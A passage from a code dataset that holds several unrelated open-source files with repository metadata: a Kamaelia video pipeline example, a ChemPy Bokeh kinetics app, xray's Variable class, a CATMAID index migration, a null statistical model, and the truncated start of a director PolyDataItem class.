files.append(os.path.join(path,fname)) files.sort() file = "/data/dirac-video/snowboard-jum-352x288x75.dirac.drc" framerate = 3 Pipeline( timedShutdown(TTL=15), PAR( Pipeline( ReadFileAdaptor(file, readmode="bitrate", bitrate = 300000*8/5), DiracDecoder(), MessageRateLimit(framerate), VideoOverlay(position=(260,48), size=(200,300)), ), Pipeline( ReadFileAdaptor(file, readmode="bitrate", bitrate = 2280960*8), DiracDecoder(), # MessageRateLimit(framerate), ToRGB_interleaved(), VideoSurface(size=(200, 300), position=(600,48)), ), Pipeline( PAR( Button(caption="Next", msg="NEXT", position=(72,8)), Button(caption="Previous", msg="PREV", position=(8,8)), Button(caption="First", msg="FIRST" ,position=(256,8)), Button(caption="Last", msg="LAST", position=(320,8)), ), Chooser(items = files), Image(size=(200,300), position=(8,48), maxpect=(200,300)), ), Pipeline( Textbox(size=(200,300), position=(8,360)), TextDisplayer(size=(200,300), position=(228,360)), ), Ticker(size=(200,300), position=(450,360)), ), ).run()
sparkslabs/kamaelia
Sketches/MPS/BugReports/FixTests/Kamaelia/Examples/UsingChassis/PAR/par_shutdown.py
Python
apache-2.0
3,471
[ "DIRAC" ]
1fbdc471886b027606f7cdbf79ef6371c9a7119ac8cbf72cf2ce404df2ff87d1
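The Kamaelia example above is built from components wired into Pipeline/PAR chassis, where each component's main() generator sends messages to its "outbox" and yields control back to the scheduler. A minimal sketch of that idiom follows; it is not part of the record, it assumes the stock ConsoleEchoer utility that ships with Kamaelia, and the Counter component name is made up.

import Axon
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Util.Console import ConsoleEchoer

class Counter(Axon.Component.component):
    def main(self):
        # Emit a few messages downstream, yielding control between sends.
        for i in range(5):
            self.send("tick %d\n" % i, "outbox")
            yield 1

Pipeline(Counter(), ConsoleEchoer()).run()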
""" Interactive kinetics app with sliders (with units). Start by runing: $ bokeh serve interactive.py Add --show argument or navigate to: http://localhost:5006/interactive """ from collections import defaultdict import sys from chempy.util.bkh import integration_with_sliders from chempy.units import SI_base_registry, default_units as u from bokeh_interactive_arrhenius import get_rsys if __name__.startswith("bk_"): from bokeh.io import curdoc Af, Ab, Ea, Er = ( 1e16 / u.molar / u.s, 1.5e15 / u.s, 72e3 * u.J / u.mol, -12e3 * u.J / u.mol, ) curdoc().add_root( integration_with_sliders( get_rsys(Af, Ab, Ea, Er), tend=3 * u.s, c0=defaultdict( lambda: 0 * u.molar, {"Fe+3": 3e-3 * u.molar, "SCN-": 1.5e-3 * u.molar} ), parameters={"temperature": 298.15 * u.K}, slider_kwargs={ "temperature": dict( start=273.15 * u.K, end=313.15 * u.K, step=0.05 * u.K ) }, get_odesys_kw=dict( unit_registry=SI_base_registry, output_conc_unit=u.molar, output_time_unit=u.second, ), ) ) elif __name__ == "__main__": import warnings warnings.warn("Run using 'bokeh serve %s'" % __file__) sys.exit(1)
bjodah/aqchem
examples/bokeh_interactive_arrhenius_units.py
Python
bsd-2-clause
1,400
[ "ChemPy" ]
36bacc5786bd8959e989271bbb653cbcef3e6f0a070a36ae71944699a838d4c6
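One detail worth noting in the record above is the defaultdict used for c0: any species not listed explicitly falls back to a zero concentration, so the slider app never raises a KeyError for products. The same pattern is shown below with plain floats; this is an illustration only, with the units dropped for brevity (the record attaches u.molar), and the "FeSCN+2" key is just an example lookup.

from collections import defaultdict

# Species omitted from the mapping default to zero concentration.
c0 = defaultdict(float, {"Fe+3": 3e-3, "SCN-": 1.5e-3})
print(c0["Fe+3"])     # 0.003
print(c0["FeSCN+2"])  # 0.0 -- implicit default for an unlisted species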
from datetime import timedelta import functools import itertools import warnings import numpy as np import pandas as pd from . import common from . import indexing from . import ops from . import utils from .pycompat import basestring, OrderedDict, zip, reduce, dask_array_type from .indexing import (PandasIndexAdapter, LazilyIndexedArray, orthogonally_indexable) import xray # only for Dataset and DataArray def as_variable(obj, key=None, strict=True): """Convert an object into a Variable - If the object is already a `Variable`, return it. - If the object is a `DataArray`, return it if `strict=False` or return its variable if `strict=True`. - Otherwise, if the object has 'dims' and 'data' attributes, convert it into a new `Variable`. - If all else fails, attempt to convert the object into a `Variable` by unpacking it into the arguments for `Variable.__init__`. """ # TODO: consider extending this method to automatically handle Iris and # pandas objects. if strict and hasattr(obj, 'variable'): # extract the primary Variable from DataArrays obj = obj.variable if not isinstance(obj, (Variable, xray.DataArray)): if hasattr(obj, 'dims') and (hasattr(obj, 'data') or hasattr(obj, 'values')): obj = Variable(obj.dims, getattr(obj, 'data', obj.values), getattr(obj, 'attrs', None), getattr(obj, 'encoding', None)) elif isinstance(obj, tuple): try: obj = Variable(*obj) except TypeError: raise TypeError('cannot convert argument into a Variable') elif utils.is_scalar(obj): obj = Variable([], obj) elif getattr(obj, 'name', None) is not None: obj = Variable(obj.name, obj) elif key is not None: obj = Variable(key, obj) else: raise TypeError('cannot infer Variable dimensions') return obj def _maybe_wrap_data(data): """ Put pandas.Index and numpy.ndarray arguments in adapter objects to ensure they can be indexed properly. NumpyArrayAdapter, PandasIndexAdapter and LazilyIndexedArray should all pass through unmodified. """ if isinstance(data, pd.Index): return PandasIndexAdapter(data) return data def _as_compatible_data(data, fastpath=False): """Prepare and wrap data to put in a Variable. - If data does not have the necessary attributes, convert it to ndarray. - If data has dtype=datetime64, ensure that it has ns precision. If it's a pandas.Timestamp, convert it to datetime64. - If data is already a pandas or xray object (other than an Index), just use the values. Finally, wrap it up with an adapter if necessary.
""" if fastpath and getattr(data, 'ndim', 0) > 0: # can't use fastpath (yet) for scalars return _maybe_wrap_data(data) # add a custom fast-path for dask.array to avoid expensive checks for the # dtype attribute if isinstance(data, dask_array_type): return data if isinstance(data, pd.Index): if isinstance(data, pd.MultiIndex): raise NotImplementedError( 'no support yet for using a pandas.MultiIndex in an ' 'xray.Coordinate') return _maybe_wrap_data(data) if isinstance(data, pd.Timestamp): # TODO: convert, handle datetime objects, too data = np.datetime64(data.value, 'ns') if isinstance(data, timedelta): data = np.timedelta64(getattr(data, 'value', data), 'ns') if (not hasattr(data, 'dtype') or not hasattr(data, 'shape') or isinstance(data, (np.string_, np.datetime64, np.timedelta64))): # data must be ndarray-like data = np.asarray(data) # we don't want nested self-described arrays data = getattr(data, 'values', data) if isinstance(data, np.ma.MaskedArray): mask = np.ma.getmaskarray(data) if mask.any(): dtype, fill_value = common._maybe_promote(data.dtype) data = np.asarray(data, dtype=dtype) data[mask] = fill_value else: data = np.asarray(data) if isinstance(data, np.ndarray): data = common._possibly_convert_objects(data) if data.dtype.kind == 'M': # TODO: automatically cast arrays of datetime objects as well data = np.asarray(data, 'datetime64[ns]') if data.dtype.kind == 'm': data = np.asarray(data, 'timedelta64[ns]') return _maybe_wrap_data(data) def _as_array_or_item(data): """Return the given values as a numpy array, or as an individual item if it's a 0-dimensional object array or datetime64. Importantly, this function does not copy data if it is already an ndarray - otherwise, it will not be possible to update Variable values in place. """ data = np.asarray(data) if data.ndim == 0: if data.dtype.kind == 'O': # unpack 0d object arrays to be consistent with numpy data = data.item() elif data.dtype.kind == 'M': # convert to a np.datetime64 object, because 0-dimensional ndarrays # with dtype=datetime64 are broken :( data = np.datetime64(data, 'ns') elif data.dtype.kind == 'm': data = np.timedelta64(data, 'ns') return data class Variable(common.AbstractArray, utils.NdimSizeLenMixin): """A netcdf-like variable consisting of dimensions, data and attributes which describe a single Array. A single Variable object is not fully described outside the context of its parent Dataset (if you want such a fully described object, use a DataArray instead). The main functional difference between Variables and numpy arrays is that numerical operations on Variables implement array broadcasting by dimension name. For example, adding a Variable with dimensions `('time',)` to another Variable with dimensions `('space',)` results in a new Variable with dimensions `('time', 'space')`. Furthermore, numpy reduce operations like ``mean`` or ``sum`` are overwritten to take a "dimension" argument instead of an "axis". Variables are light-weight objects used as the building block for datasets. They are more primitive objects, so operations with them provide marginally higher performance than using DataArrays. However, manipulating data in the form of a Dataset or DataArray should almost always be preferred, because they can use more complete metadata in context of coordinate labels. """ def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False): """ Parameters ---------- dims : str or sequence of str Name(s) of the data dimension(s).
Must be either a string (only for 1D data) or a sequence of strings with length equal to the number of dimensions. data : array_like Data array which supports numpy-like data access. attrs : dict_like or None, optional Attributes to assign to the new variable. If None (default), an empty attribute dictionary is initialized. encoding : dict_like or None, optional Dictionary specifying how to encode this array's data into a serialized format like netCDF4. Currently used keys (for netCDF) include '_FillValue', 'scale_factor', 'add_offset' and 'dtype'. Well-behaved code to serialize a Variable should ignore unrecognized encoding items. """ self._data = _as_compatible_data(data, fastpath=fastpath) self._dims = self._parse_dimensions(dims) self._attrs = None self._encoding = None if attrs is not None: self.attrs = attrs if encoding is not None: self.encoding = encoding @property def dtype(self): return self._data.dtype @property def shape(self): return self._data.shape @property def nbytes(self): return self.size * self.dtype.itemsize @property def _in_memory(self): return isinstance(self._data, (np.ndarray, PandasIndexAdapter)) @property def data(self): if isinstance(self._data, dask_array_type): return self._data else: return self.values @data.setter def data(self, data): data = _as_compatible_data(data) if data.shape != self.shape: raise ValueError( "replacement data must match the Variable's shape") self._data = data def _data_cached(self): if not isinstance(self._data, np.ndarray): self._data = np.asarray(self._data) return self._data @property def _indexable_data(self): return orthogonally_indexable(self._data) def load(self): """Manually trigger loading of this variable's data from disk or a remote source into memory and return this variable. Normally, it should not be necessary to call this method in user code, because all xray functions should either work on deferred data or load data automatically. """ self._data_cached() return self def load_data(self): # pragma: no cover warnings.warn('the Variable method `load_data` has been deprecated; ' 'use `load` instead', FutureWarning, stacklevel=2) return self.load() def __getstate__(self): """Always cache data as an in-memory array before pickling""" self._data_cached() # self.__dict__ is the default pickle object, we don't need to # implement our own __setstate__ method to make pickle work return self.__dict__ @property def values(self): """The variable's data as a numpy.ndarray""" return _as_array_or_item(self._data_cached()) @values.setter def values(self, values): self.data = values def to_variable(self): """Return this variable as a base xray.Variable""" return Variable(self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True) def to_coord(self): """Return this variable as an xray.Coordinate""" return Coordinate(self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True) def to_index(self): """Convert this variable to a pandas.Index""" return self.to_coord().to_index() @property def dims(self): """Tuple of dimension names with which this variable is associated.
""" return self._dims def _parse_dimensions(self, dims): if isinstance(dims, basestring): dims = (dims,) dims = tuple(dims) if len(dims) != self.ndim: raise ValueError('dimensions %s must have the same length as the ' 'number of data dimensions, ndim=%s' % (dims, self.ndim)) return dims @dims.setter def dims(self, value): self._dims = self._parse_dimensions(value) def _item_key_to_tuple(self, key): if utils.is_dict_like(key): return tuple(key.get(dim, slice(None)) for dim in self.dims) else: return key def __getitem__(self, key): """Return a new Array object whose contents are consistent with getting the provided key from the underlying data. NB. __getitem__ and __setitem__ implement "orthogonal indexing" like netCDF4-python, where the key can only include integers, slices (including `Ellipsis`) and 1d arrays, each of which are applied orthogonally along their respective dimensions. The difference does not matter in most cases unless you are using numpy's "fancy indexing," which can otherwise result in data arrays whose shapes are inconsistent with (or just uninterpretable in terms of) the variable's dimensions. If you really want to do indexing like `x[x > 0]`, manipulate the numpy array `x.values` directly. """ key = self._item_key_to_tuple(key) key = indexing.expanded_indexer(key, self.ndim) dims = tuple(dim for k, dim in zip(key, self.dims) if not isinstance(k, (int, np.integer))) values = self._indexable_data[key] # orthogonal indexing should ensure the dimensionality is consistent if hasattr(values, 'ndim'): assert values.ndim == len(dims), (values.ndim, len(dims)) else: assert len(dims) == 0, len(dims) return type(self)(dims, values, self._attrs, fastpath=True) def __setitem__(self, key, value): """__setitem__ is overloaded to access the underlying numpy values with orthogonal indexing. See __getitem__ for more details. """ key = self._item_key_to_tuple(key) if isinstance(self._data, dask_array_type): raise TypeError("this variable's data is stored in a dask array, " 'which does not support item assignment. To ' 'assign to this variable, you must first load it ' 'into memory explicitly using the .load_data() ' 'method or accessing its .values attribute.') data = orthogonally_indexable(self._data_cached()) data[key] = value @property def attrs(self): """Dictionary of local attributes on this variable. """ if self._attrs is None: self._attrs = OrderedDict() return self._attrs @attrs.setter def attrs(self, value): self._attrs = OrderedDict(value) @property def encoding(self): """Dictionary of encodings on this variable. """ if self._encoding is None: self._encoding = {} return self._encoding @encoding.setter def encoding(self, value): self._encoding = dict(value) def copy(self, deep=True): """Returns a copy of this object. If `deep=True`, the data array is loaded into memory and copied onto the new object. Dimensions, attributes and encodings are always copied. """ data = self.values.copy() if deep else self._data # note: # dims is already an immutable tuple # attributes and encoding will be copied when the new Array is created return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def __copy__(self): return self.copy(deep=False) def __deepcopy__(self, memo=None): # memo does nothing but is required for compatibility with # copy.deepcopy return self.copy(deep=True) # mutable objects should not be hashable __hash__ = None @property def chunks(self): """Block dimensions for this array's data or None if it's not a dask array.
""" return getattr(self._data, 'chunks', None) _array_counter = itertools.count() def chunk(self, chunks=None, name='', lock=False): """Coerce this array's data into a dask array with the given chunks. If this variable is a non-dask array, it will be converted to a dask array. If it's a dask array, it will be rechunked to the given chunk sizes. If chunks are not provided for one or more dimensions, chunk sizes along that dimension will not be updated; non-dask arrays will be converted into dask arrays with a single block. Parameters ---------- chunks : int, tuple or dict, optional Chunk sizes along each dimension, e.g., ``5``, ``(5, 5)`` or ``{'x': 5, 'y': 5}``. name : str, optional Used to generate the name for this array in the internal dask graph. Does not need to be unique. lock : optional Passed on to :py:func:`dask.array.from_array`, if the array is not already a dask array. Returns ------- chunked : xray.Variable """ import dask.array as da if utils.is_dict_like(chunks): chunks = dict((self.get_axis_num(dim), chunk) for dim, chunk in chunks.items()) if chunks is None: chunks = self.chunks or self.shape data = self._data if isinstance(data, dask_array_type): data = data.rechunk(chunks) else: if name: name += '_' name = 'xray_%s%s' % (name, next(self._array_counter)) if utils.is_dict_like(chunks): chunks = tuple(chunks.get(n, s) for n, s in enumerate(self.shape)) data = da.from_array(data, chunks, name=name, lock=lock) return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def isel(self, **indexers): """Return a new array indexed along the specified dimension(s). Parameters ---------- **indexers : {dim: indexer, ...} Keyword arguments with names matching dimensions and values given by integers, slice objects or arrays. Returns ------- obj : Array object A new Array with the selected data and dimensions. In general, the new variable's data will be a view of this variable's data, unless numpy fancy indexing was triggered by using an array indexer, in which case the data will be a copy. """ invalid = [k for k in indexers if k not in self.dims] if invalid: raise ValueError("dimensions %r do not exist" % invalid) key = [slice(None)] * self.ndim for i, dim in enumerate(self.dims): if dim in indexers: key[i] = indexers[dim] return self[tuple(key)] def transpose(self, *dims): """Return a new Variable object with transposed dimensions. Parameters ---------- *dims : str, optional By default, reverse the dimensions. Otherwise, reorder the dimensions to this order. Returns ------- transposed : Variable The returned object has transposed data and dimensions with the same attributes as the original. Notes ----- Although this operation returns a view of this variable's data, it is not lazy -- the data will be fully loaded. See Also -------- numpy.transpose """ if len(dims) == 0: dims = self.dims[::-1] axes = self.get_axis_num(dims) data = ops.transpose(self.data, axes) return type(self)(dims, data, self._attrs, self._encoding, fastpath=True) def squeeze(self, dim=None): """Return a new Variable object with squeezed data. Parameters ---------- dim : None or str or tuple of str, optional Selects a subset of the length one dimensions. If a dimension is selected with length greater than one, an error is raised. If None, all length one dimensions are squeezed. Returns ------- squeezed : Variable This array, but with all or a subset of the dimensions of length 1 removed.
Notes ----- Although this operation returns a view of this variable's data, it is not lazy -- the data will be fully loaded. See Also -------- numpy.squeeze """ dims = dict(zip(self.dims, self.shape)) return common.squeeze(self, dims, dim) def expand_dims(self, dims, shape=None): """Return a new variable with expanded dimensions. When possible, this operation does not copy this variable's data. Parameters ---------- dims : str or sequence of str or dict Dimensions to include on the new variable. If a dict, values are used to provide the sizes of new dimensions; otherwise, new dimensions are inserted with length 1. Returns ------- Variable """ if isinstance(dims, basestring): dims = [dims] if shape is None and utils.is_dict_like(dims): shape = dims.values() missing_dims = set(self.dims) - set(dims) if missing_dims: raise ValueError('new dimensions must be a superset of existing ' 'dimensions') self_dims = set(self.dims) expanded_dims = tuple(d for d in dims if d not in self_dims) + self.dims if shape is not None: dims_map = dict(zip(dims, shape)) tmp_shape = [dims_map[d] for d in expanded_dims] expanded_data = ops.broadcast_to(self.data, tmp_shape) else: expanded_data = self.data[(None,) * (len(expanded_dims) - self.ndim)] expanded_var = Variable(expanded_dims, expanded_data, self._attrs, self._encoding, fastpath=True) return expanded_var.transpose(*dims) def fillna(self, value): return self._fillna(value) def reduce(self, func, dim=None, axis=None, keep_attrs=False, allow_lazy=False, **kwargs): """Reduce this array by applying `func` along some dimension(s). Parameters ---------- func : function Function which can be called in the form `func(x, axis=axis, **kwargs)` to return the result of reducing an np.ndarray over an integer valued axis. dim : str or sequence of str, optional Dimension(s) over which to apply `func`. axis : int or sequence of int, optional Axis(es) over which to apply `func`. Only one of the 'dim' and 'axis' arguments can be supplied. If neither are supplied, then the reduction is calculated over the flattened array (by calling `func(x)` without an axis argument). keep_attrs : bool, optional If True, the variable's attributes (`attrs`) will be copied from the original object to the new one. If False (default), the new object will be returned without attributes. **kwargs : dict Additional keyword arguments passed on to `func`. Returns ------- reduced : Array Array with summarized data and the indicated dimension(s) removed. """ if dim is not None and axis is not None: raise ValueError("cannot supply both 'axis' and 'dim' arguments") if dim is not None: axis = self.get_axis_num(dim) data = func(self.data if allow_lazy else self.values, axis=axis, **kwargs) removed_axes = (range(self.ndim) if axis is None else np.atleast_1d(axis) % self.ndim) dims = [dim for n, dim in enumerate(self.dims) if n not in removed_axes] attrs = self._attrs if keep_attrs else None return Variable(dims, data, attrs=attrs) @classmethod def concat(cls, variables, dim='concat_dim', indexers=None, shortcut=False): """Concatenate variables along a new or existing dimension. Parameters ---------- variables : iterable of Array Arrays to stack together. Each variable is expected to have matching dimensions and shape except for along the stacked dimension. dim : str or DataArray, optional Name of the dimension to stack along. This can either be a new dimension name, in which case it is added along axis=0, or an existing dimension name, in which case the location of the dimension is unchanged. 
Where to insert the new dimension is determined by the first variable. indexers : iterable of indexers, optional Iterable of indexers of the same length as variables which specifies how to assign variables along the given dimension. If not supplied, indexers is inferred from the length of each variable along the dimension, and the variables are stacked in the given order. shortcut : bool, optional This option is used internally to speed-up groupby operations. If `shortcut` is True, some checks of internal consistency between arrays to concatenate are skipped. Returns ------- stacked : Variable Concatenated Variable formed by stacking all the supplied variables along the given dimension. """ if not isinstance(dim, basestring): dim, = dim.dims # can't do this lazily: we need to loop through variables at least # twice variables = list(variables) first_var = variables[0] arrays = [v.data for v in variables] # TODO: use our own type promotion rules to ensure that # [str, float] -> object, not str like numpy if dim in first_var.dims: axis = first_var.get_axis_num(dim) dims = first_var.dims if indexers is None: data = ops.concatenate(arrays, axis=axis) else: data = ops.interleaved_concat(arrays, indexers, axis=axis) else: axis = 0 dims = (dim,) + first_var.dims data = ops.stack(arrays, axis=axis) attrs = OrderedDict(first_var.attrs) if not shortcut: for var in variables: if var.dims != first_var.dims: raise ValueError('inconsistent dimensions') utils.remove_incompatible_items(attrs, var.attrs) return cls(dims, data, attrs) def _data_equals(self, other): return (self._data is other._data or ops.array_equiv(self.data, other.data)) def equals(self, other): """True if two Variables have the same dimensions and values; otherwise False. Variables can still be equal (like pandas objects) if they have NaN values in the same locations. This method is necessary because `v1 == v2` for Variables does element-wise comparisons (like numpy.ndarrays). """ other = getattr(other, 'variable', other) try: return (self.dims == other.dims and self._data_equals(other)) except (TypeError, AttributeError): return False def broadcast_equals(self, other): """True if two Variables have the same values after being broadcast against each other; otherwise False. Variables can still be equal (like pandas objects) if they have NaN values in the same locations. """ try: self, other = broadcast_variables(self, other) except (ValueError, AttributeError): return False return self.equals(other) def identical(self, other): """Like equals, but also checks attributes.
""" try: return (utils.dict_equiv(self.attrs, other.attrs) and self.equals(other)) except (TypeError, AttributeError): return False def __array_wrap__(self, obj, context=None): return Variable(self.dims, obj) @staticmethod def _unary_op(f): @functools.wraps(f) def func(self, *args, **kwargs): return self.__array_wrap__(f(self.data, *args, **kwargs)) return func @staticmethod def _binary_op(f, reflexive=False, **ignored_kwargs): @functools.wraps(f) def func(self, other): if isinstance(other, (xray.DataArray, xray.Dataset)): return NotImplemented self_data, other_data, dims = _broadcast_compat_data(self, other) new_data = (f(self_data, other_data) if not reflexive else f(other_data, self_data)) result = Variable(dims, new_data) return result return func @staticmethod def _inplace_binary_op(f): @functools.wraps(f) def func(self, other): if isinstance(other, xray.Dataset): raise TypeError('cannot add a Dataset to a Variable in-place') self_data, other_data, dims = _broadcast_compat_data(self, other) if dims != self.dims: raise ValueError('dimensions cannot change for in-place ' 'operations') self.values = f(self_data, other_data) return self return func ops.inject_all_ops_and_reduce_methods(Variable) class Coordinate(Variable): """Wrapper around pandas.Index that adds xray specific functionality. The most important difference is that Coordinate objects must always have a name, which is the dimension along which they index values. Coordinates must always be 1-dimensional. In addition to Variable methods and properties (attributes, encoding, broadcasting), they support some pandas.Index methods directly (e.g., get_indexer), even though pandas does not (yet) support duck-typing for indexes. """ def __init__(self, name, data, attrs=None, encoding=None, fastpath=False): super(Coordinate, self).__init__(name, data, attrs, encoding, fastpath) if self.ndim != 1: raise ValueError('%s objects must be 1-dimensional' % type(self).__name__) def _data_cached(self): if not isinstance(self._data, PandasIndexAdapter): self._data = PandasIndexAdapter(self._data) return self._data def __getitem__(self, key): key = self._item_key_to_tuple(key) values = self._indexable_data[key] if not hasattr(values, 'ndim') or values.ndim == 0: return Variable((), values, self._attrs, self._encoding) else: return type(self)(self.dims, values, self._attrs, self._encoding, fastpath=True) def __setitem__(self, key, value): raise TypeError('%s values cannot be modified' % type(self).__name__) def copy(self, deep=True): """Returns a copy of this object. If `deep=True`, the values array is loaded into memory and copied onto the new object. Dimensions, attributes and encodings are always copied. """ # there is no need to copy the index values here even if deep=True # since pandas.Index objects are immutable data = PandasIndexAdapter(self) if deep else self._data return type(self)(self.dims, data, self._attrs, self._encoding, fastpath=True) def _data_equals(self, other): return self.to_index().equals(other.to_index()) def to_coord(self): """Return this variable as an xray.Coordinate""" return self def to_index(self): """Convert this variable to a pandas.Index""" # n.b. 
creating a new pandas.Index from an old pandas.Index is # basically free as pandas.Index objects are immutable assert self.ndim == 1 return pd.Index(self._data_cached().array, name=self.dims[0]) # pandas.Index like properties: @property def name(self): return self.dims[0] @name.setter def name(self, value): raise AttributeError('cannot modify name of Coordinate in-place') def get_indexer(self, label): return self.to_index().get_indexer(label) def slice_indexer(self, start=None, stop=None, step=None): return self.to_index().slice_indexer(start, stop, step) def slice_locs(self, start=None, stop=None): return self.to_index().slice_locs(start, stop) def get_loc(self, label): return self.to_index().get_loc(label) @property def is_monotonic(self): return self.to_index().is_monotonic def is_numeric(self): return self.to_index().is_numeric() def _unified_dims(variables): # validate dimensions all_dims = OrderedDict() for var in variables: var_dims = var.dims if len(set(var_dims)) < len(var_dims): raise ValueError('broadcasting cannot handle duplicate ' 'dimensions: %r' % list(var_dims)) for d, s in zip(var_dims, var.shape): if d not in all_dims: all_dims[d] = s elif all_dims[d] != s: raise ValueError('operands cannot be broadcast together ' 'with mismatched lengths for dimension %r: %s' % (d, (all_dims[d], s))) return all_dims def _broadcast_compat_variables(*variables): dims = tuple(_unified_dims(variables)) return tuple(var.expand_dims(dims) if var.dims != dims else var for var in variables) def broadcast_variables(*variables): """Given any number of variables, return variables with matching dimensions and broadcast data. The data on the returned variables will be a view of the data on the corresponding original arrays, but dimensions will be reordered and inserted so that both broadcast arrays have the same dimensions. The new dimensions are sorted in order of appearance in the first variable's dimensions followed by the second variable's dimensions. """ dims_map = _unified_dims(variables) dims_tuple = tuple(dims_map) return tuple(var.expand_dims(dims_map) if var.dims != dims_tuple else var for var in variables) def _broadcast_compat_data(self, other): if all(hasattr(other, attr) for attr in ['dims', 'data', 'shape', 'encoding']): # `other` satisfies the necessary Variable API for broadcast_variables new_self, new_other = _broadcast_compat_variables(self, other) self_data = new_self.data other_data = new_other.data dims = new_self.dims else: # rely on numpy broadcasting rules self_data = self.data other_data = other dims = self.dims return self_data, other_data, dims
hetland/xray
xray/core/variable.py
Python
apache-2.0
34,824
[ "NetCDF" ]
531681871002b4354dcf242df4483704cb98bcc00b74090d5343071ef11eb3c7
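Editor's note: a minimal sketch exercising the Variable API defined in the record above, assuming the legacy `xray` package (the pre-rename xarray) is importable; the array values are illustrative.

import numpy as np
from xray.core.variable import Variable

v = Variable(('x', 'y'), np.arange(6).reshape(2, 3))
print(v.isel(x=0).dims)             # ('y',)
print(v.transpose('y', 'x').dims)   # ('y', 'x')

# Stacking two compatible variables along a new dimension inserts it at axis 0.
stacked = Variable.concat([v, v], dim='z')
print(stacked.dims)                 # ('z', 'x', 'y')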
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2017-07-19 14:36 from django.db import migrations, models forward = """ CREATE INDEX treenode__history_skeleton_id_index ON treenode__history (skeleton_id); CREATE INDEX treenode_connector__history_skeleton_id_index ON treenode_connector__history (skeleton_id); CREATE INDEX review__history_skeleton_id_index ON review__history (skeleton_id); CREATE INDEX class_instance_class_instance__history_class_instance_a_index ON class_instance_class_instance__history (class_instance_a); CREATE INDEX class_instance_class_instance__history_class_instance_b_index ON class_instance_class_instance__history (class_instance_b); CREATE INDEX treenode_class_instance__history_relation_id_index ON treenode_class_instance__history (relation_id); CREATE INDEX treenode_class_instance__history_treenode_id_index ON treenode_class_instance__history (treenode_id); """ backward = """ DROP INDEX treenode__history_skeleton_id_index; DROP INDEX treenode_connector__history_skeleton_id_index; DROP INDEX review__history_skeleton_id_index; DROP INDEX class_instance_class_instance__history_class_instance_a_index; DROP INDEX class_instance_class_instance__history_class_instance_b_index; DROP INDEX treenode_class_instance__history_relation_id_index; DROP INDEX treenode_class_instance__history_treenode_id_index; """ class Migration(migrations.Migration): """Add indices that improve the performance of some history queries, for instance in the Neuron History Widget or when retrieving historic skeleton data for animation. """ dependencies = [ ('catmaid', '0023_update_edit_txids'), ] operations = [ migrations.RunSQL(forward, backward) ]
tomka/CATMAID
django/applications/catmaid/migrations/0024_add_neuron_history_indices.py
Python
gpl-3.0
1,787
[ "NEURON" ]
f2c47b9e8617f15034cdf3d3fd67c226396195d13a72a5328190a539a6c436b8
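Editor's note: a hedged sketch of how a `RunSQL` migration like the one above is applied and reversed through Django's management API; the settings module name is an assumption, while the app label and migration prefixes come from the file itself.

import os
import django
from django.core.management import call_command

# Assumed settings module; adjust for the actual CATMAID deployment.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
django.setup()

call_command('migrate', 'catmaid', '0024')  # runs the `forward` SQL
call_command('migrate', 'catmaid', '0023')  # rolls back via `backward`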
"""Null statistical model. Stat model that always returns 0. This is the null model used to compare results with and without a statistical model. """ from typing import Any, Callable import dataclasses from epi_forecast_stat_mech.statistical_models import base @dataclasses.dataclass class Null(base.StatisticalModel): """Null statistical model. Attributes: predict_module: flax.deprecated.nn.Module that takes `inputs` and `output_size` arguments and returns array of shape `[batch, output_size]` that will be used to predict locations of the gaussian distributed `observations` and possibly scales, depending on whether `error_model` is 'full'. log_prior_fn: function that computes log_prior on a parameters of the `predict_module`. """ log_prior_fn: Callable[..., Any] = None def init_parameters(self, rng, covariates, epidemic_observables): """Returns initial parameters generated at model construction time.""" return None def log_prior(self, parameters): """Returns the log probability of `parameters` based on priors. Args: parameters: parameters of the statistical model. Returns: log-probabilities: A scalar """ return 0. def log_likelihood(self, parameters, covariates, observations): """Returns the log likelihood of `observations`. Args: parameters: parameters of the statistical model. covariates: A numpy array of shape "location" x "static_covariate". observations: A tree of mech_params that we want to explain. Returns: A log-likelihood. The return is a scalar (0). """ return 0. def predict(self, parameters, covariates, observations): """Predicts a distribution over `observations` based on `covariates`. Args: parameters: parameters of the statistical model. covariates: array representing covariates for each location. observations: structure of observations to be predicted. Returns: None """ return None, None
HopkinsIDD/EpiForecastStatMech
epi_forecast_stat_mech/statistical_models/no_stat_model.py
Python
apache-2.0
2,024
[ "Gaussian" ]
e3a181cc188faaf23490feb313efe67e0cfa93dcb76fedd29da1c77c291f903d
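Editor's note: a quick check of the null model's contract described above; every statistical hook is a no-op, so both log-probabilities are zero and predictions are empty. Assumes the package is importable; the covariate shape is illustrative.

import numpy as np
from epi_forecast_stat_mech.statistical_models.no_stat_model import Null

model = Null()
params = model.init_parameters(rng=None, covariates=None,
                               epidemic_observables=None)
covariates = np.zeros((3, 2))  # 3 locations, 2 static covariates

assert params is None
assert model.log_prior(params) == 0.
assert model.log_likelihood(params, covariates, observations=None) == 0.
assert model.predict(params, covariates, observations=None) == (None, None)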
import director.objectmodel as om import director.applogic as app from shallowCopy import shallowCopy import director.vtkAll as vtk from director import transformUtils from director import callbacks from director import frameupdater from PythonQt import QtCore, QtGui import os import colorsys import weakref import itertools import numpy as np class PolyDataItem(om.ObjectModelItem): defaultScalarRangeMap = { 'intensity' : (400, 4000), 'spindle_angle' : (0, 360), 'azimuth' : (-2.5, 2.5), 'scan_delta' : (0.0, 0.3), 'point distance to plane' : (-0.2, 0.2), 'normal angle to plane' : (0.0, 10.0), } def __init__(self, name, polyData, view): om.ObjectModelItem.__init__(self, name, om.Icons.Robot) self.views = [] self.polyData = polyData self.mapper = vtk.vtkPolyDataMapper() self.mapper.SetInput(self.polyData) self.actor = vtk.vtkActor() self.actor.SetMapper(self.mapper) self.shadowActor = None self.scalarBarWidget = None self.extraViewRenderers = {} self.rangeMap = dict(PolyDataItem.defaultScalarRangeMap) self.addProperty('Color By', 0, attributes=om.PropertyAttributes(enumNames=['Solid Color'])) self.addProperty('Visible', True) self.addProperty('Alpha', 1.0, attributes=om.PropertyAttributes(decimals=2, minimum=0, maximum=1.0, singleStep=0.1, hidden=False)) self.addProperty('Point Size', self.actor.GetProperty().GetPointSize(), attributes=om.PropertyAttributes(decimals=0, minimum=1, maximum=20, singleStep=1, hidden=False)) self.addProperty('Surface Mode', 0, 